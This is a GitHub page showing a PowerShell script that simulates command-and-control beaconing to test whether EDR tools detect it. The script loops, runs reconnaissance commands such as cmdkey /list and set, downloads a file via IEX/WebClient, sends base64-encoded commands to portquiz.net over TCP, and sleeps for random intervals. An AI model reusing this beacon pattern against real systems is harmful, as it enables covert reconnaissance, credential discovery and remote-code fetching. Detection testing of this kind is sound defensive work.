-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy pathsim-c2-beacon-lolbin.ps1
More file actions
47 lines (40 loc) · 1.72 KB
/
sim-c2-beacon-lolbin.ps1
File metadata and controls
47 lines (40 loc) · 1.72 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
#Test your EDR to see if its going to see anything
# dchow[AT]xtecsystems.com
$payloads = @(
"cmd.exe /c whoami",
"cmd.exe /c cmdkey /list",
"cmd.exe /c route print",
"cmd.exe /c gpresult -R",
"cmd.exe /c set",
"powershell.exe -Command IEX(New-Object System.Net.WebClient).DownloadFile(""http://portquiz.net/index.html"", ""C:\Users\Public\Downloads\pen_test_benign.exe"")",
"powershell.exe -Command `$path = 'C:\Users\Public\Downloads\pen_test_benign.exe'; `$proc = Start-Process -FilePath powershell.exe -ArgumentList ""-nop -WindowStyle Hidden -Command"""
)
while ($true) {
$payload = Get-Random -InputObject $payloads
$encodedPayload = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($payload))
Write-Host "Sending payload: $payload"
$result = Test-NetConnection -ComputerName portquiz.net -Port 443 -InformationLevel Quiet
if ($result -eq $true) {
Write-Host "Connection successful. Sending encoded payload:"
Write-Host $encodedPayload
$socket = New-Object System.Net.Sockets.TcpClient("portquiz.net", 443)
$stream = $socket.GetStream()
$writer = New-Object System.IO.StreamWriter($stream)
$writer.Write($encodedPayload)
$writer.Flush()
$writer.Close()
$stream.Close()
$socket.Close()
Write-Host "Payload sent successfully."
}
else {
Write-Host "Connection failed. Skipping payload send."
}
#Added to ensure local triggers of LOLbins
Write-Host "Executing: $payload"
Invoke-Expression $payload
$sleepTime = Get-Random -Minimum 60 -Maximum 600
Write-Host "Sleeping for $sleepTime seconds..."
Start-Sleep -Seconds $sleepTime
Write-Host ""
}